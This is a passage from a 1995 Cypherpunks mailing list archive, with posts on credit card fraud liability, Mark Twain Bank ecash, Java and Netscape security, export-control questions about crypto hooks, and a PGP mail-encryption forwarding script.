where you can also get your hands on the shorter MFAQ (Most
Frequently Asked Questions).

Hope this helps.  I'm on an info-diet, Cypherpunk Lite, so if 
you want to respond to this message, please be sure to "cc"
me directly.

Cassiel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Fri, 17 Nov 1995 08:50:49 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161848.KAA06931@netcom3.netcom.com>
Message-ID: <Pine.HPP.3.91.951116143115.21342A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir:
Calm down.  This is why I started my post with "Maybe this is stupidly
obvious question but....."  I am trying to illustrate some simple points
and ask some simple questions:

1. Risk to a cardholder is on a vastly different scale than risk to the Bank 
Consortiums that run the credit card business. Charge offs and fraud
are of course as you point out a cost of doing business.  If it is not an 
acceptable risk to the card holder and the bank it won't happen.  The bank
won't deploy a system that they view as exposing them to unacceptable loss.
The cardholder will not use a system that offers him no recourse to recover
losses. End of Story.  

2. The Bank Consortiums are doing a poor job of explaining to cardholders
merchants and developers such as you and me that are supposed to
implement these "open" specs exactly *what* our risks are in developing and
deploying these systems on our servers. The bank consortiums will have 
contracts or usage agreements governing the clearing of transactions in 
cyberspace.   When a loss is claimed by a cardholder, how will the loss
(if there is one) be allocated between the cardholder, merchant, the company
operating the server that processed the credit card and the bank be 
allocated.  

3.  I'm getting tired of seeing posts this list about what is more dangerous
cyberspace or restaurantspace.  Let's focus on the real mechanics of how
the ground rules of credit card clearing will operate in cyberspace. The
credit card consortiums can advance the cause of electronic commerce by
stating in unambigous terms what their views are of these ground rules.
Developers, cardholders and merchants can then make a judgement on whether
those risks are acceptable to each party respectively.  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Fri, 17 Nov 1995 07:20:28 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <Pine.HPP.3.91.951116152854.21342B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


In this context is the merchant defined as the the corporation selling the
physical good for delivery or the corporation that is operating the server?
These two parties under certain circumstances may be the same party, but 
in this example lets assume they are seperate entities.

If I am interpreting "internet based stores" in the proper context, the 
cardholder and the bank have recourse against the company operating the 
server.  Is this correct?  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."

On Thu, 16 Nov 1995, John Pettitt wrote:

> At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
> >
>         ... about credit card liability
> 
> Hmmm, a few words about credit card liabilty.
> 
> The situation now is that in a "card not present" transaction the merchant is
> liable for the fraud.  This means that *a lot* of internet based stores are 
> getting eaten alive by fraud.  The big issue right now is not cards being
> stolen from the telco switch (yes it's a risk but can anybody cite it
> happening?).
> The issue is authentication of the card user.  We have a significant
> investment in 
> AI / credit scoring code to defeat the wannabe crackers.  This goes way beyond
> mod 10 checks and address verification.
> 
> [ as an aside I've put two people in jail this year for card fraud ]
> 
> John
> John Pettitt, jpp@software.net
> VP Engineering, CyberSource Corporation, 415 473 3065
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 17 Nov 1995 07:31:12 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <9511162041.AA03234@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The situation now is that in a "card not present" transaction the merchant is
>liable for the fraud.  This means that *a lot* of internet based stores are 
>getting eaten alive by fraud.

This is not quite accurate. In the US there is that distinction, in the UK
the credit card co is responsible. For that reason the requirement that
goods be delivered to the billing address _ONLY_ is strictly enforced.


>[ as an aside I've put two people in jail this year for card fraud ]

Good to hear that!

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 12:02:42 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>
Message-ID: <199511162356.PAA28194@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 

	If you used ecash to pay for a c2.org account, neither I nor
the bank would be able to trace the payment into the c2.org account to
an actual account at mark twain bank.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 10:12:46 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>
Message-ID: <199511162357.PAA28293@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Donations are also possible through the remailer interface
at http://www.c2.org/remail/by-www.phtml and
https://www.c2.org/remail/by-www.phtml

	Once you send a message you'll be prompted if you want to pay
for the service you just used.

> 
> Although Private Idaho will always remain free, to encourage Ecash use, 
> my Web page will support "donations."  The initial merchant list sounds 
> like it's going to be a subset of this list.  Time to go add the Mark 
> Twain links to the page.  This is going to be fun...
> 
> Joel McNamara
> joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 08:58:52 +0800
To: cypherpunks@toad.com
Subject: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d07acd12fd83388@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Bob, let me do a minor vent here.

Fine, Tim. Vent away. In a minor key, even.

>You are critical of E. Allen Smith's viewpoint, and essentially question
>whether he has anything to sell. Not much of an argument.

It's a damn good argument, which I'll get to in a minute. It was just done
rudely, and for that I apologise to the list.

What I got was a reactionary flame which had nothing to do with the
(admittedly flag-waving) post I put up, which I should have ignored, but
instead I responded with a reactionary flame of my own, which got me a
reactionary flame from a Senior Member of the List, one with Maximum
Reputation... It has been ever thus, for those of you who've been around
here since I showed up a year ago last April. I just can't seem to color
inside the lines, as far as Dr. May is concerned.

>1. I'm not selling anything, and won't sign up just for "moral support."

I believe that was my point, Tim. You're *not* selling anything. I was
sending a message to people out there who *are*. People who are, or are
going to, use non-certificate payment methods, like credit cards, and who,
if they're subscribed to this list, should be clueful enough to do this and
know why they should do it. Besides that, it's free. Until Friday. ;-).

>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>cash we hope to see will not likely hinge on the success of one particular
>operations, such as MTB.

Nope. But if people completely ignored the Wright Brothers, would Curtiss
have entered the market? (An interesting example, as the Wrights sued
Curtiss for patent enfringement and lost, I think.)

>3. The success of BankAmericard (later renamed Visa) came when real
>customers and real shops started to use it, not when early pioneers set
>themselves up as clearinghouses and whatnot.

I am talking about real shops. With real customers. I bet you haven't even
looked at the list of shops yet. What I'm planning to do is to offer
subscriptions and sponsorships of the e$ lists we're putting up on an ecash
server. Putting my money where my mouth is. Literally.

>I have more interesting things to do, personally, than to be a pioneer so I
>can then have nothing to sell, and little to buy....when "interesting
>markets" start to appear, I'll look at it again.

This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
could have some ham and eggs, if we had some eggs." or, "If we lived here,
we'd be home now." Feh. You can do better than that. I've seen you do it.

But, to answer your nonexistant point, yes, people *are* starting to sell
things on the net. We know that the best way to do that in the long run is
with cash, and with other digital bearer certificate technologies. Not just
because these methods are secure. Not because they allow anonymity. They're
just starting to, and when they've been accepted in the market, they will
be nothing else but. All we need is a scenario where the digital cash
underwriter relies upon the ATM system for validation of identity, and the
second an anonymous bank account uses the underwriter, we have totally
anonymous digital cash. We're very close here.

>But when you urge people to be pioneers, and they express reservations or
>doubts about the system, attacking their motives or implying they have
>nothing to sell anyway is not too helpful.

Yes. it was rude. I apologise both to the list, to Dr. May, and to (soon to
be Dr.) Mr. Smith. Mostly for stopping discussion with a thinly veiled
insult.

>Just my views, but, then, I don't have any customers either.

Which brings me to my real point, here. Why I used an informal fallacy of
my own, and lashed out with an ad hominem attack against someone with an
.edu domain on their e-mail address, after they dissed something I think is
a good idea, at least for a start.

So, why did I do this? I didn't understand it at the time, but it's
probably class warfare. :-).

I just heard something on an NPR(!) talkshow with a guy talking about his
book about the three power group of american culture. It used to be what he
called the "episcopacy", the Groton-Harvard-State Department types who
ruled both government and the guts of American business until say, the
depression and World War II.  These people were there primarily there
because their families were there. They were "the nice people of Boston"
that Rose Kennedy had so many problems with. In 1953, say, it may interest
you to know, that the standardized test scores for Harvard were the same as
those for the population at large. George Bush was one of these, but so was
FDR.

Nowadays, this guy says, (I can't remember who he is, but he wrote a book
about it, so we'll find out soon enough), we have *three* power elites in
this country.

The first class is the class he called the "mandarins". These people have
inherited most of the trappings, and titles, of the old episcopacy. These
are people who tested well, who were typically plucked from obscurity to go
to the best schools, and go on to places like Harvard, where the scores are
now way above average, and is now pretty much pure meritocracy as far as
admission is concerned, political correctness aside. Mandarins go on to get
advanced degrees. Camille Paglia, Milton Friedman, Carl Sagan, Billary
Clinton are all mandarins.  This is good. The best and the brightest get
the best educations. They're also the people who start things like the Viet
Nam war, and the welfare state.

The second class are the "lifers". These people who go to state schools,
get uninspired grades, and spend their working lives in the same
institution. Colin Powell, most Fortune 500 CEOS circa 1983, Lyndon Johnson
and Bob Dole are lifers.

The third class are "talents". Newt, and Edison, and most computer or
internet entrepreneurs are talents, especially if they have no formal
computer science training except what they taught themselves.

Like any set of categories, nobody is exclusively one class or another,
except that credentialism has allowed mandarins to capture the cultural
flag for the time being. Einstein and Whit Diffie are talents who got
mandarin credentials. Richard Stallman is a talent who will probably get
mandarin credentials posthumously.;-). Bill Gates is a proto-mandarin who
figured out he was a talent. Sloan was a talent with mandarin credentials
who created a whole industry full of lifers.

Pioneers tend to be talents, Tim.  They tend to talk in generalities, and
not color between the lines. They tend to make up rules as they go along,
and sometimes, like Mr. Bill, they create rules the rest of us have to
follow whether we want to or not.

One of my messier theories about the internet is that it was invented by
mandarins. Now the talents, the people you call pioneers, have moved in,
and they're much more pragmatic, and have little patience for crystalline
perfection, because inefficiency and chaos is where they find beauty, joy,
and all those other nasty imprecise concepts. When thing settle down a bit,
the lifers will come.  They're trying to do it now, by building sites like
www.time.com, or buying into sites like www.wired.com.

Even though you're an iconoclast, Tim, I couldn't help but think of you and
the proto-Dr. Smith as mandarins when I got you're response to my post. I
was trying to shout over your heads to all the talents out there trying to
make money on the net.

Even though you may think of yourself as a mountain man -- or maybe a
cowboy -- watching the settlers come, I feel more like I've upset the
decorum by hollering in the faculty tea room. Having embarrassed myself
that way, I'll try not to do it again. Because, oddly enough, we need each
other.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 17 Nov 1995 09:30:39 +0800
To: stend@cris.com
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511162204.QAA02889@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> said:

>> Card Imprints taken with no online authorisation are typically
>> charged a transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM
>> card transactions are charged at around $0.10 per transaction.

VZN> are you saying that a typical mail order credit card transaction
VZN> has a 3-6% charge, because the card is not physically present?

	No, s/he was talking about merchants who verify that you have
the credit available (online authorization) vs those who trust you to
have it (no online authorization).  As I understand it, the fee is
'insurance' that the merchant will be paid - as long as there is no
fraud on the part of the merchant, it will receive payment, even if the
charge was invalid, because the card was canceled/stolen/over limit/etc.
The lower charge for online authorization is because when the charge
comes back approved, the CC company is able to verify that the credit is
there.  This isn't foolproof (2 separate charges, each under the
available credit, can be approved even if the total exceeds the
available credit), but it's more than the offline merchants can do.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 08:23:04 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <9511162108.AA08466@all.net>
MIME-Version: 1.0
Content-Type: text


> 3.  Postscript considered dangerous:   (insert-smiley) 
> 
> As for the question of someone invoking a postscript interpreter via a
> browser and thus opening up their system to some rogue postscript
> file: I think it would be great if either of these two things were to
> magically happen:
> 
> 	1) people would stop putting postscript docs on web pages
> 	because it's the wrong technology for WWW - it wastes
> 	bandwidth - it's hard to view & hence often ugly - everyone
> 	just prints it out anyway and then complains because there
> 	is no one "standard" implementation of postscript printing
> 	worldwide and there are dozens of minor problems
> 
> 	2) someone could implement a secure postscript previewer
> 	(whatever that means!) 
> 
> I doubt either of those two things will happen.  The average Jo on the
> internet needs to understand that when s/he downloads binary files
> over the internet and run them from insecure programs on their local
> computer, well, s/he runs some risk.  This risk might be tiny, but
> it's impossible to quantify loss.  If I lose a poem that I'm writing,
> to me that's priceless, so I do not intend to imply that loss of data
> isn't tragic for the person who loses it.  If you have data you can't
> bear to lose, be sure to practice safe computing.  Perform backups
> regularly, and use judgement about which interpreters and executable
> programs you allow to run on your PC.
> 
> Marianne

It seems clear from this that Netscape, or at least Marianne who seems
to speak for Netscpe, doesn't understand the protection issues that my
clients face.  I will nevertheless forward this official Netscape line
to them so they can better understand why I tell them it is insecure.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 17 Nov 1995 08:23:02 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <199511162114.QAA11306@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> The best thing to do if you want to implement your own
> intra-corporation security model in the short run is to get a copy of
> the beta source code, and take a look at AppletSecurity.java and
> AppletClassLoader.java.  You can substitute your own versions of those
> for your inhouse use.  This is relatively easy to do with the
> appletviewer, and although it's possible to do some binary hack on
> moz2_0.car and replace certain files with your own, it's probably not
> everyone's cup of tea.  I mean, there's a difference between what you
> can do, and what you want to do ... I understand that!


The real question here I had was.. can this be done in Netscape..
I know it can be done in HotJava.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 17 Nov 1995 10:23:54 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511162113.QAA08492@universe.digex.net>
Message-ID: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Scott Brickner wrote:
> 
> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

It's not too hard to think of a compression scheme that needs extra 
information to be passed from client to server; the obvious example is 
some sort of dictionary compression with external dictionaries (can be 
very effective for short messages where LZW etc never get a chance to get 
going). 

Another, more likely case, is where the object could have been compressed 
by several schemes, and a scheme ID is needed to determine which 
alogorithm to use. 

The real issue would appear to be intent, though. If it's obvious that 
the real intention for the hook is to allow encryption to be added, 
the State department can jump on it. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 17 Nov 1995 09:43:30 +0800
To: ecm@ai.mit.edu
Subject: Mark Twain Bank ecash scripts needed
Message-ID: <199511162325.QAA16375@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I am in the process of setting up a shop using Mark Twain Bank
Ecash.  Could someone please forward me the scripts to accept Ecash
(running on SunOS.  On c2.org actually) and/or any advice you have
about how to expeditiously implement a shop?  I am about to fax MTB
the agreement form, so I should get information from them "within 24
hours", but that is cutting it awfully close to the Friday deadline
for the US$300.00 fee waiver.


Many thanks!


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKvIGfWZSllhfG25AQElIQP+McHbg+ZCWMhSZ0YDDFwHE/TVhlAPrNX5
Oh2/8n3IirDb3KePXlvSdXAtCXS9ROuHSMqN9UQ0cPX9kOdgFMomwvsCqo9G5eZ0
Tan+9IW0WcvtntJ+8DFIN5jhlEbT5b+HRlKul1SkImezFM1kRDM4qqD1LD6srGRe
NEV32AZG1dU=
=A6lY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:48:30 +0800
To: Tom DeNapoli <denap@isis.com>
Subject: Re: Q: blind maildrop anyone?
In-Reply-To: <199511161409.JAA08809@polyphony.sw.stratus.com>
Message-ID: <KJ9qwo9g/gwI085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> What I'd like to do is: establish an email account, other than the one I'm
> posting from; preferably on some free email/homepage box, that would encrypt
> all cleartext email to hit that account for me at this account.  I have tried,
> unsuccessfully to establish this at c2, which offers this service.

> My question: has anyone done this successfully at c2, or another location, 
> and be willing to point me in the right direction to accomplish this.

You could telnet to nyx.cs.du.edu and set up an (optionally pseudonymous)
free account.  I've installed a perl script (posted to this list by George
Magiros) that automagically encrypts a user's incoming email by piping it
through pgp 2.6.2.  To use it, create a .forward file consisting of the line:

"| /nyx/user/bin/privacy <YourPGPKeyID>"

This is far less effective than Sameer's c2 system, but it's simple enough
for net.novices to use.  You can retrieve your encrypted email via telnet,
ftp, or an offline mail reader that has hooks for pgp and works with mail
packets created by uqwk, which is also installed here.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvUFlRRFMq4NZY5AQG+fwP/ecBYX/0mwiLy6ouDqkWHiObT9MQjMLqz
wsOYx6GLPqhPxsIFaXFA/EqR7FqyPwJrZauFpiVQawIj4KKw4TLGMAkQ5uOMe8wx
kr9Zj9iK1mXZ3m6FML7jAJqky+blp7H+noQuX2IYPzbhVhjLUk0pPZqNp76JJrGa
kYjx/B/2xFI=
=NzcI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:52:58 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, Nov. 19, 2 pm
Message-ID: <cS9qwo9g/42D085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Once again, we'll begin in the basement of the Tivoli, at downtown
Denver's Auraria Campus, and perhaps wander elsewhere.  Drop me a
note if you need directions or more info.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvVWFRRFMq4NZY5AQGDngP/XVXubqwKaFIa+Exo75BYjyKADVZI33tX
tOugaQG8Swla6wyPiUOfdTUdF49ZRHnVbowGw3o33k+3dMlfiC/ng2JqGOAyS9NR
zVUzIrPROMEBLS69FuLmaYDO/38dG5Xoqfir44qXm50mcEtfCZO7ILbG4dVKGBEI
0FxI3tAPTDU=
=njUa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Fri, 17 Nov 1995 00:08:36 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511161638.AA15806@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


'unsuscribe'








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 16 Nov 1995 13:59:41 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511142220.AA13813@sulphur.osf.org>
Message-ID: <199511160546.QAA00358@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Rich Salz <rsalz@osf.org>
  and rsalz@osf.org, ses@tipper.oit.unc.edu
  and cypherpunks@toad.com, owner-cypherpunks@toad.com,
  and s1113645@tesla.cc.uottawa.ca

...
> >are specifically designed for the insertion of cryptographic materials, 
> >or is it the fact that they could be used to support cryptographic 
...
> Basically, generic buffer-manipulation is okay.  "Keyed compression"
> where you explicitly passed something called a key to a DLL routine
> would be looked on suspiciously.
...

Why would you call it a key?

How about compression "options"? The compression algorithm could
have a "speed" mode and a "size" mode. It could also have options
for file type etc...

Recipient id could be passed along to check which compression
method the recipient knows.

...
> An abstract set of open/modify/close
> routines (where open returned a pointer to opaque state, say a session
> key :) would be fine.
...

So what's the difference... apart from what it's called?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKrQSyxV6mvvBgf5AQFUqAP/R3IGOey/1NbyyzTLYgRsrcbQtM1HHc73
PzXijxLJHvCjUTRaHS1feBRJv+dbwAMlH8yO+Q4DKuy5YCdv5f3kJz0Bsyejr8/C
R3JOPSH4nePOGR8rfTK1AUMPQIGn50NXIaNT0OLdVSGU3444W4xruXiqkLlzduBn
2UNLX7DNXls=
=wGpa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 17 Nov 1995 09:39:25 +0800
To: cypherpunks@toad.com
Subject: GHO_mac
Message-ID: <199511162229.RAA29474@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Sciences, November/December, 1995


   Another realm of explosive population increase is in
   cyberspace, a phenomenon taken up in this issue with Sherry
   Turkle's "Ghosts in the Machine." Here the growth comes
   about not only in the traditional way but also in wildly
   non-traditional ways. People multiply themselves on the
   Internet, grafting various aspects of their personalities
   onto distinct characters. Even more unsettling, as Turkle
   wittily documents the matter, is that the Net is populated
   with "bots": robot sentence-parsing engines that can do
   fair impersonations of real people, often well enough to
   (provisionally) pass Alan M. Turing's test for machine
   consciousness. Do you really know who -- or what -- you're
   talking to?

   The future of all this is murky and mind-boggling:
   Information-seeking bots even now can tie up sites on the
   World-Wide Web. Bots impersonating people share chat groups
   with other bots, much the way telephone answering machines
   now "talk" to each other. Internet chatter gets so dense
   that bandwidth and other Net resources become strained: the
   site at the Los Alamos National Laboratory now
   (automatically) warns robots away with a chilling threat to
   "initiate automated 'seek and destroy' " action against the
   machine from which the robot seems to be launched. A
   conservative reaction may already be setting in, determined
   to have users identify, encrypt and authenticate every
   packet of information they send across the Net.

   Net fatigue becomes a recognized medical syndrome; Net
   detox centers spring up; Net warfare breaks out; Net
   starvation becomes a recognized social problem; Net
   demagogues undermine local democracies....

   How many people can the Net support? -- Peter Brown, Editor

   -----

   For "Ghost in the Machine" by Sherry Turkle, a professor of
   the sociology of science at the Massachusetts Institute of
   Technology. The article is adapted from her forthcoming
   book, *Life on the Screen: Identity in the Age of the
   Internet*, which is being published in November by Simon &
   Schuster:

   GHO_mac (16 kb)



... later this evening, that is.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:00:35 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Mandarins, Lifers, and Talents
Message-ID: <acd11f1c0102100498cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Lots of different issues here....

At 9:02 PM 11/16/95, Robert Hettinga wrote:

>Reputation... It has been ever thus, for those of you who've been around
>here since I showed up a year ago last April. I just can't seem to color
>inside the lines, as far as Dr. May is concerned.

Unfair, unfair! I don't plan to dig up old posts where I said good things
about Bob's posts, but I know I have. His style differs from mine, of
course, but I usually avoid critiquing mere styles.

On to some other points in Bob's post: (quoting me)

>>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>>cash we hope to see will not likely hinge on the success of one particular
>>operations, such as MTB.
>
>Nope. But if people completely ignored the Wright Brothers, would Curtiss
>have entered the market? (An interesting example, as the Wrights sued
>Curtiss for patent enfringement and lost, I think.)

"Flight" is a very interesting example to consider. Flight happened for a
lot of reaons, including technological feasibility, relatively low entry
costs, willingness of customers to pay for faster travel, etc.

It really did not happen because of cheerleaders. This is a recurring
belief of mine, notably in my occasional interactions with the nanotech
community, as a few members of this list can attest to. The "Rah, Rah"s--no
pun intended--play a minor role in adoption of new products and
technologies.


>>I have more interesting things to do, personally, than to be a pioneer so I
>>can then have nothing to sell, and little to buy....when "interesting
>>markets" start to appear, I'll look at it again.
>
>This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
>could have some ham and eggs, if we had some eggs." or, "If we lived here,
>we'd be home now." Feh. You can do better than that. I've seen you do it.

One argument I am never persuaded by is the hackerish "Feh." (Does anybody
but hackers use this strange word?)

In any case, I'm not interested in "doing better than that." My support for
Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
as one could study flight, to use Bob's example, without operating a
passenger service or a flying school, so one can be interested in digital
cash without "opening an account."

>But, to answer your nonexistant point, yes, people *are* starting to sell
>things on the net. We know that the best way to do that in the long run is
...

Ah, but I never claimed otherwise (perhaps this is what you mean by "your
nonexistant point"). My point was only that digital cash will happen mostly
when it fills a need, or is accepted by customers, not by cheerleading and
by urging people on this list to be pioneers.

(And actually I have nothing against urging people to be pioneers. Or
cheerleading. It doesn't consume much list bandwidth and it may actually
help get someone started. Which is why I didn't call for an end to
cheerleading and pioneer-recruiting.)

The theories about mandarins, lifers, and talents I'll discuss at another
time, maybe. All I'll say is that I think it's too simple a categorization.
Maybe it's a Boston viewpoint. The folks I've worked with over the years
bear almost no resemblance to any of these categories. In any case, people
will start using digital cash if and when it fulfills some need, or some
need they never knew they had, gets stimulated.

On a personal note--which is weird, since 1000 or more people may be
reading this message, though most probably haven't read this far--I think
it best not to get too emotionally attached to some particular outcome in
the introduction of a new technology. Most product and technology successes
are essentially unpredictable, and many things thought to be sure things
are failures. I've seen many "prophets" wailing to the world that their
visions _deserve_ success.

The technologies which hit the right chord rarely need, or benefit from,
the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
any of the other so-called evangelists to succeed. The microprocessor did
not evangelists. The airplane did not. The VCR did not. The cellular phone
did not.

In fact, I can't think of an example of a major technology that _did_
depend critically on cheerleaders and evangelists. Some examples may exist,
but they seem to be rare. And I can think immediately of several
technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
enthusiasts--but in which progress has been stalled or proceeded along
different paths for different reasons.

